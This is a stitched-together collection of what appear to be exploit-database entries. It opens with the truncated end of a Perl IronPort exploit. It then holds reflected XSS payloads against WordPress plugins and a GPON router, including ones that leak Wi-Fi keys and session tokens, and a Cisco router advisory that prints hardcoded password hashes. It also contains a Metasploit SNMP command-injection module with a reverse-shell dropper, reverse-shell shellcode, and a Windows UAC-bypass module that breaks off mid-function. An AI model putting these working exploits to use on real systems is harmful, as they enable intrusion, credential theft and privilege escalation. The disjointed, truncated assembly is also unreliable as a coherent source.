say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# ===================================================================================\n";
if (defined ($response->content) and ($response->content =~ m/$attacker/)){
  print "# IronPort is Poisoned! Exploitation successfully\n";
  exit;

} else {

  print "# Exploitation failed!!!\n";
  exit;

}

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Spryng payments woocommerce 1.6.7

Spryng payments woocommerce is prone to a reflected cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue following steps:
The XSS reflected because the value url is not filter correctly:

Demo Request GET:
http://54.174.186.120//wordpress/wp-content/plugins/spryng-payments-woocommerce/views/public/threed_authenticate.php?url=http://google.es%22%20%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%20%3Cdemo=%22

* Exploit Title: WordPress Download Manager Cross-site Scripting
* Discovery Date: 2019-04-13
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.93
* Category: WebApps, WordPress
CVE:CVE-2019-15889
Description
--

In the pro features of the WordPress download manager plugin, there is
a Category Short-code feature witch can use to sort categories with
order by a function which will be used as ?orderby=title,publish_date
.
By adding parameter "> and add any XSS payload , the xss payload will execute.

To reproduce,

1.Go to the link where we can find ?orderby
2.Add parameters >” and give simple payload like <script>alert(1)</script>
3.The payload will execute.
--

PoC
--

<div class="btn-group btn-group-sm pull-right"><button type="button"
class="btn btn-primary" disabled="disabled">Order &nbsp;</button><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>

--
Demo
--
https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
--


Another reflected cross-site scripting via advance search

https://server/wpdmpro/advanced-search/

https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a

Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU

# Date: 31.03.2019

# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl

# Vendor Homepage: https://dasanzhone.com

# Version: <= S3.1.285

# Alternate Version: <= S3.0.738

# Tested on: version S3.1.285 (alternate version S3.0.738)

# CVE : CVE-2019-10677


= Reflected Cross-Site Scripting (XSS) =

http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp


= Stored Cross-Site Scripting (XSS) =

* WiFi network plaintext password

http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//

http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//

* CSRF token

http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//


= Clickjacking =

<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>

SEC Consult Vulnerability Lab Security Advisory < 20190904-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Cisco RV340, Cisco RV340W, Cisco RV345, Cisco RV345P,
                     Cisco RV260, Cisco RV260P, Cisco RV260W, Cisco 160,
                     Cisco 160W
 vulnerable version: Cisco RV34X - 1.0.02.16, Cisco RV16X/26X - 1.0.00.15
      fixed version: see "Solution"
         CVE number: -
             impact: High
           homepage: https://www.cisco.com/
              found: 2019-05-15
                 by: T. Weber, S. Viehböck (Office Vienna)
                     IoT Inspector
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Securely connecting your small business to the outside world is as important
as connecting your internal network devices to one another. Cisco Small
Business RV Series Routers offer virtual private networking (VPN) technology
so your remote workers can connect to your network through a secure Internet
pathway."

Source: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html


Business recommendation:
------------------------
We want to thank Cisco for the very quick and professional response and great
coordination. Customers are urged to update the firmware of their devices.


Vulnerability overview/description:
-----------------------------------
1) Hardcoded Credentials
The device contains hardcoded users and passwords which can be used to login
via SSH on an emulated device at least.

During the communication with Cisco it turned out that:
"Accounts like the 'debug-admin' and 'root' can not be accessed
from console port, CLI or webui".
Therefore, these accounts had no real functionality and cannot be used for
malicious actions.

2) Known GNU glibc Vulnerabilities
The used GNU glibc in version 2.19 is outdated and contains multiple known
vulnerabilities. The outdated version was found by IoT Inspector. One of
the discovered vulnerabilities (CVE-2015-7547, "getaddrinfo() buffer overflow")
was verified by using the MEDUSA scalable firmware runtime.

3) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.23.2 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
One of the discovered vulnerabilities (CVE-2017-16544) was verified by using
the MEDUSA scaleable firmware runtime.


4) Multiple Vulnerabilities - IoT Inspector Report
Further information can be found in IoT Inspector report:
https://r.sec-consult.com/ciscoiot


Proof of concept:
-----------------
1) Hardcoded Credentials
The following hardcoded hashes were found in the 'shadow' file of the firmware:
root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:99999:7:::
debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:99999:7:::
[...]

The undocumented user 'debug-admin' is also contained in this file.

Starting the dropbear daemon as background process on emulated firmware:
-------------------------------------------------------------------------------
# dropbear -E
# [1109] <timestamp> Running in background
#
# [1112] <timestamp> Child connection from <IP>:52718
[1112] <timestamp> /var must be owned by user or root, and not writable by others
[1112] <timestamp> Password auth succeeded for 'debug-admin' from <IP>:52718
-------------------------------------------------------------------------------

Log on via another host connected to the same network. For this PoC the
password of the debug-admin was changed in the 'shadow' file.
-------------------------------------------------------------------------------
[root@localhost medusa]# ssh debug-admin@<IP> /bin/ash -i
debug-admin@<IP>'s password:
/bin/ash: can't access tty; job control turned off


BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

/tmp $
-------------------------------------------------------------------------------

The 'debug-admin' user has the same privileges like 'root'. This can be
determined from the corresponding sudoers file in the firmware:
[...]
## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
[...]

During the communication with Cisco it turned out that:
"Accounts like the 'debug-admin' and 'root' can not be accessed
from console port, CLI or webui".
Therefore, these accounts had no real functionality and cannot be used for
malicious actions.

2) Known GNU glibc Vulnerabilities
GNU glibc version 2.19 contains multiple CVEs like:
CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984, CVE-2015-1472,
CVE-2015-5277, CVE-2015-8778, CVE-2015-8779, CVE-2017-1000366 and more.

The getaddrinfo() buffer overflow vulnerability was checked with the help of
the exploit code from https://github.com/fjserna/CVE-2015-7547. It was compiled
and executed on the emulated device to test the system.

# python cve-2015-7547-poc.py &
[1] 961
# chroot /medusa_rootfs/ bin/ash


BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

# gdb cve-2015-7547_glibc_getaddrinfo
[...]
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
Connected with 127.0.0.1:41782
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
[TCP] Request2 len recv 36
Cannot access memory at address 0x4

Program received signal SIGSEGV, Segmentation fault.
0x76f1fd58 in ?? () from /lib/libc.so.6
(gdb)

References:
https://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
https://github.com/fjserna/CVE-2015-7547


3) Known BusyBox Vulnerabilities
BusyBox version 1.23.2 contains multiple CVEs like:
CVE-2016-2148, CVE-2016-6301, CVE-2015-9261, CVE-2016-2147, CVE-2018-20679,
CVE-2017-16544 and CVE-2019-5747.
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device:

A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
]55;test.txt
#
-------------------------------------------------------------------------------

4) Multiple Vulnerabilities - IoT Inspector Report
Further information can be found in IoT Inspector report:
https://r.sec-consult.com/ciscoiot

The summary is below:
IoT Inspector Vulnerability #1 BusyBox CVE entries
Outdated BusyBox version is affected by 7 published CVEs.

IoT Inspector Vulnerability #2 curl CVE entries
Outdated curl version is affected by 35 published CVEs.

IoT Inspector Vulnerability #3 GNU glibc CVE entries
Outdated GNU glibc version is affected by 44 published CVEs.

IoT Inspector Vulnerability #4 GNU glibc getaddrinfo() buffer overflow
Outdated GNU glibc version is affected by CVE-2015-7547.

IoT Inspector Vulnerability #5 Hardcoded password hashes
Firmware contains multiple hardcoded credentials.

IoT Inspector Vulnerability #6 Linux Kernel CVE entries
Outdated Linux Kernel version affected by 512 published CVEs.

IoT Inspector Vulnerability #7 MiniUPnPd CVE entries
Outdated MiniUPnPd version affected by 2 published CVEs.

IoT Inspector Vulnerability #8 Dnsmasq CVE entries
Outdated MiniUPnPd version affected by 1 published CVE.

IoT Inspector Vulnerability #9 Linux Kernel Privilege Escalation “pp_key”
Outdated Linux Kernel version is affected by CVE-2015-7547.

IoT Inspector Vulnerability #10 OpenSSL CVE entries
Outdated OpenSSL  version affected by 6 published CVEs.


Vulnerable / tested versions:
-----------------------------
The following firmware versions have been tested with IoT Inspector and
firmware emulation techniques:
Cisco RV340  / 1.0.02.16
Cisco RV340W / 1.0.02.16
Cisco RV345  / 1.0.02.16
Cisco RV345P / 1.0.02.16
The following firmware versions have been tested with IoT Inspector only:
Cisco RV260  / 1.0.00.15
Cisco RV260P / 1.0.00.15
Cisco RV260W / 1.0.00.15
Cisco RV160  / 1.0.00.15
Cisco RV160P / 1.0.00.15

The firmware was obtained from the vendor website:
https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.02.16
https://software.cisco.com/download/home/286316464/type/282465789/release/1.0.00.15


Vendor contact timeline:
------------------------
2019-05-15: Contacting vendor through psirt@cisco.com.
2019-05-16: Vendor confirmed the receipt.
2019-05-2019-08: Periodic updates about the investigation from the vendor.
            Clarification which of the reported issues will be fixed.
2019-08-20: The vendor proposed the next possible publication date for the
            advisory for 2019-09-04. The vendor added the RV160 and RV260
            router series to be vulnerable to the same issues too.
2019-09-04: Coordinated advisory release.


Solution:
---------
Upgrade to the newest available firmware version.

Additionally, the vendor provides the following security notice:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190904-sb-vpnrouter


Workaround:
-----------
None.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2019

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SNMPClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
'Name'           => "AwindInc SNMP Service Command Injection",
'Description'    => %q{
        This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
        A valid SNMP read-write community is required to exploit this vulnerability.

        The following devices are known to be affected by this issue:

          * Crestron Airmedia AM-100 <= version 1.5.0.4
          * Crestron Airmedia AM-101 <= version 2.5.0.12
          * Awind WiPG-1600w <= version 2.0.1.8
          * Awind WiPG-2000d <= version 2.1.6.2
          * Barco wePresent 2000 <= version 2.1.5.7
          * Newline Trucast 2 <= version 2.1.0.5
          * Newline Trucast 3 <= version 2.1.3.7
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Quentin Kaiser <kaiserquentin[at]gmail.com>'
        ],
'References'     =>
        [
          ['CVE', '2017-16709'],
          ['URL', 'https://github.com/QKaiser/awind-research'],
          ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
        ],
'DisclosureDate' => '2019-03-27',
'Platform'       => ['unix', 'linux'],
'Arch'           => [ARCH_CMD, ARCH_ARMLE],
'Privileged'     => true,
'Targets'        => [
        ['Unix In-Memory',
'Platform'    => 'unix',
'Arch'        => ARCH_CMD,
'Type'        => :unix_memory,
'Payload'     => {
'Compat'    => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'}
          }
        ],
        ['Linux Dropper',
'Platform'    => 'linux',
'Arch'        => ARCH_ARMLE,
'CmdStagerFlavor' => %w[wget],
'Type'        => :linux_dropper
        ]
      ],
'DefaultTarget'  => 1,
'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}))

    register_options(
      [
        OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
      ])
  end


  def check
    begin
      connect_snmp
      sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
      print_status("Target system is #{sys_description}")
      # AM-100 and AM-101 considered EOL, no fix so no need to check version.
      model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
      case model
      when 'AM-100', 'AM-101'
          return CheckCode::Vulnerable
      else
          # TODO: insert description check for other vulnerable models (that I don't have)
          # In the meantime, we return 'safe'.
          return CheckCode::Safe
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
    Exploit::CheckCode::Unknown
  end

  def inject_payload(cmd)
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Injection successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def trigger
    begin
      connect_snmp
      varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1))
      resp = snmp.set(varbind)
      if resp.error_status == :noError
        print_status("Trigger successful")
      else
        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
      end
    rescue SNMP::RequestTimeout
      print_error("#{ip} SNMP request timeout.")
    rescue Rex::ConnectionError
      print_error("#{ip} Connection refused.")
    rescue SNMP::UnsupportedVersion
      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      disconnect_snmp
    end
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, opts = {})
    # The payload must start with a valid FTP URI otherwise the injection point is not reached
    cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"

    # When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback
    # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
    # keep our reverse shell opened :)
    cmd << "$(pkill -f /etc/reboot.sh)"

    # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
    cmd << "A" * (255-cmd.length)

    # we inject our payload in camFWUpgradeFTPURL
    print_status("Injecting payload")
    inject_payload(cmd)

    # we trigger the firmware download via FTP, which will end up calling this
    # "/bin/getRemoteURL.sh %s %s %s %d"
    print_status("Triggering call")
    trigger
  end
end

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Api bearer auth 20181229

Api bearer auth is prone to a reflected cross-site scripting vulnerability
because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue following steps:
The XSS reflected because the value url is not filter correctly:

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert(%22R1XS4.COM%22)%3C/script%3E

/*
; name       : Exploit Title: Linux/x86 - TCP reverse shell 127.0.0.1 nullbyte free
; date       : 04th sept, 2019
; author     : Sandro "guly" Zaccarini
; twitter    : @theguly
; blog       : https://gulyslae.github.io/
; SLAE32     : SLAE-1037
; purpose    : the program will create a new connection to 127.0.0.1:4444 and spawns a shell
;              this code has been written as extramile for SLAE32 assignment 2
; license    : CC-BY-NC-SA

  global _start
    section .text

      _start:
      ; start by zeroing eax,ebx. not really needed because registers are clean, but better safe than sorry
      xor eax,eax
      xor ebx,ebx

      ; ----------------------------------------------------------------------------------------
      ; purpose     : create a socket
      ; references  : man socket
      ; description :
      ; socketcall is the syscall used to work with socket. i'm going to use this syscall to create and connect
      ; the very first thing i have to do, is to create the socket itself. by reading references, i see that she needs 3 registers:
      ; eax => syscall id 0x66 for socketcall, that will be the same for every socketcall call of course and that's why i created a function on top
      ; ebx => socket call id, that is 0x1 for socket creation
      ; ecx => pointer to socket args
      ;
      ; man socket shows me that socket's args are:
      ; domain   => AF_INET because i'm creating a inet socket, and is 0x2
      ; type     => tcp is referenced as STREAM, that is 0x1
      ; protocol => unneded here because there is no inner protocol, so i'll use 0x0

      ; not, i'm creating ecx because a zeroed eax is perfect for the purpose
      ; arg will be pushed in reverse order with no hardcoded address: 0, 1, 2
      push eax
      inc eax
      push eax
      inc eax
      push eax

      ; because socketcall needs a pointer, i'm moving esp address to ecx
      mov ecx,esp

      ; prepare eax to hold the socketcall value as discussed before. i'm not hardcoding 0x66 to (try to) fool some static analysis: 0x33 is sysacct and looks harmless to me
      mov al,0x33
      add al,0x33

      ; because ebx has been zeroed, i can just inc to have it to 1 for socketcall to call socket (pun intended :) )
      inc ebx

      ; do the call and create socket
      int 0x80

      ; because syscall rets to eax, if everything's good, eax will hold socket file descriptor: save it to esi to store it safe for the whole run
      mov esi,eax

      ; ----------------------------------------------------------------------------------------
      ; purpose     : connect to raddr:rport
      ; references  : man connect , man 7 ip
      ; description :
      ; eax => syscall id 0x66 for socketcall
      ; ebx => connect call id, 0x3 taken from linux/net.h
      ; ecx => pointer to address struct
      ;
      ; man connect shows me that args are:
      ; sockfd  => already saved in esi
      ; address => pointer to ip struct
      ; addrlen => addrlen is 32bit (0x10)
      ;
      ; man 7 ip shows address struct details. arguments are:
      ; family => AF_INET, so 0x2
; port   => hardcoded 4444
; addr   => 127.0.0.1

; zero again
xor eax,eax

; push arg in reverse and move the pointer to ecx
; prepare stack pointer to addr struct defined in man 7 ip
; as exercise, i'm going to use 127.0.0.1 as remote address, because it contains null bytes
; hex value of 127.0.0.1 is 0x0100007f
; pushing 0x00000000 to esp by using a known null register. i've also could used sub esp,0x8 because i have enough room, or mov eax,[esp] or another zillion of similal instructions
push eax
mov byte [esp], 0x7f
; now esp is: 0x0000007f
mov byte [esp+3],0x01
; now esp is: 0x0100007f

; push port to bind to, 4444 in hex, to adhere to msf defaults :)
push word 0x5c11
; push AF_INET value as word again
inc ebx
push word bx
; get stack pointer to ecx
mov ecx,esp

; same call to have 0x66 to eax and do socketcall
mov al,0x33
add al,0x33

; push arg, again in reverse order
push eax
; pointer to addr struct
push ecx
; sockfd, saved before to esi
push esi
; stack pointer to ecx again, to feed bind socketcall
mov ecx,esp

; ebx is 0x2, i need 0x3
inc ebx

; do the call
int 0x80

; ----------------------------------------------------------------------------------------
; purpose     : create fd used by /bin//sh
; references  : man dup2
; description : every shell has three file descriptor: STDIN(0), STDOUT(1), STDERR(2)
; this code will create said fd
; eax => 0x3f
; ebx => clientid
; ecx => newfd id, said file descriptor
;
; i'm going to create them by looping using ecx, to save some instruction. ecx will start at 2, then is dec and fd is created.
; as soon as ecx is 0, the loop ends


; i'm using a different method from one i've used for bindshell just to try.
; i'll put 0x3 to ecx to start creating STDERR just after dec
; ecx is dirty but edx is 0x0, just swap them
; edit: actually, running from a C code you'll have edx dirty. zero it...
xor edx,edx
xchg ecx,edx
mov cl,0x3

; copy socket fd to ebx to feed clientid
mov ebx,esi

; zero eax and start the loop
xor eax,eax

; dup2 call id
mov al,0x3f
; dec ecx to have 2,1,0
dec ecx
int 0x80

mov al,0x3f
; dec ecx to have 2,1,0
dec ecx
int 0x80

mov al,0x3f
; dec ecx to have 2,1,0
dec ecx
int 0x80

; ----------------------------------------------------------------------------------------
; purpose     : spawn /bin//sh
; references  : man execve
; description : put /bin//sh on the stack, aligned to 8 bytes to prevent 0x00 in the shellcode itself
; and null terminating it by pushing a zeroed register at first
; eax => execve call, 0xB
; ebx => pointer to executed string, which will be /bin//sh null terminated
; ecx => pointer to args to executed command, that could be 0x0
; edx => pointer to environment, which could be 0x0
;
; i need to push a null byte to terminate the string, i know ecx is 0x0 so i can save one op
push ecx
push 0x68732f2f
push 0x6e69622f
; here the stack will looks like a null terminated /bin/sh:
; /bin//sh\0\0\0\0\0\0\0\0

; and place pointer to ebx
mov ebx,esp

; envp to edx and ecx
push ecx
mov edx,esp
push ecx
mov ecx,esp

; execve syscall here
mov al,0xB

; and pop shell
int 0x80

; neat exit
xor eax,eax
mov al,0x1
int 0x80

*/

#include <stdio.h>
#include <string.h>

unsigned char buf[] = "\x31\xc0\x31\xdb\x50\x40\x50\x40\x50\x89\xe1\xb0\x33\x04\x33\x43\xcd\x80\x89\xc6\x31\xc0\x50\xc6\x04\x24\x7f\xc6\x44\x24\x03\x01\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\xb0\x33\x04\x33\x50\x51\x56\x89\xe1\x43\xcd\x80\x31\xd2\x87\xca\xb1\x03\x89\xf3\x31\xc0\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\xb0\x3f\x49\xcd\x80\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x51\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";


void main() {
  printf("Shellcode Length:  %d\n", strlen(buf));
  int (*ret)() = (int(*)())buf;
  ret();
}

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Ecpay logistics for woocommerce 1.2.181030

Ecpay logistics for woocommerce is prone to a reflected cross-site
scripting vulnerability because it fails to sufficiently sanitize
user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue following steps:
The XSS reflected because the value url is not filter correctly:

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/ecpay-logistics-for-woocommerce/getChangeResponse.php?&CVSStoreName=hola2%22;%20%3C/script%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(
      update_info(info,
'Name'          => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry',
'Description'   => %q(
        This module exploits a flaw in the WSReset.exe file associated with the Windows
        Store.  This binary has autoelevate privs, and it will run a binary file
        contained in a low-privilege registry location.  By placing a link to
        the binary in the registry location, WSReset.exe will launch the binary as
        a privileged user.
        ),
'License'       => MSF_LICENSE,
'Author'        => [
'ACTIVELabs',   # discovery
'sailay1996',   # poc
'bwatters-r7',  # metasploit module
        ],
'Platform'      => ['win'],
'SessionTypes'  => ['meterpreter'],
'Targets'       => [[ 'Automatic', {} ]],
'DefaultTarget' => 0,
'DefaultOptions' => {
'WfsDelay'     => 15
        },
'DisclosureDate'  => 'Feb 19 2019',
'Notes'           =>
        {
'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
        },
'References'    => [
          ['URL', 'https://www.activecyber.us/activelabs/windows-uac-bypass'],
          ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'],
          ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'],
        ]
      )
    )
    register_options(
      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
    )

  end

  def check
    if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe")
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    # get directory locations straight
    win_dir = session.sys.config.getenv('windir')
    vprint_status("win_dir = " + win_dir)
    tmp_dir = session.sys.config.getenv('tmp')
    vprint_status("tmp_dir = " + tmp_dir)
    exploit_dir = win_dir + "\\System32\\"
    vprint_status("exploit_dir = " + exploit_dir)
    reset_filepath = exploit_dir + "WSReset.exe"
    vprint_status("exploit_file = " + reset_filepath)

    # make payload
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
    payload_pathname = tmp_dir + '\\' + payload_name
    vprint_status("payload_pathname = " + payload_pathname)
    vprint_status("Making Payload")
    payload = generate_payload_exe
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
    registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"


    # make registry changes
    vprint_status("Making Registry Changes")
    begin
      registry_createkey(registry_key)
      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
      registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
    rescue ::Exception => e
      print_error(e.to_s)
    end
    vprint_status("Registry Changes Complete")
    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
    write_file(payload_pathname, payload)
    vprint_status("Payload Upload Complete")

    vprint_status("Launching " + reset_filepath)
    begin
      session.sys.process.execute("cmd.exe /c \"#{reset_filepath}\"", nil, 'Hidden' => true)
    rescue ::Exception => e
      print_error(e.to_s)
    end
    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
    # wait for a few seconds before cleaning up
    sleep(20)
    vprint_status("Removing Registry Changes")
    registry_deletekey(registry_key)
    vprint_status("Registry Changes Removed")
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
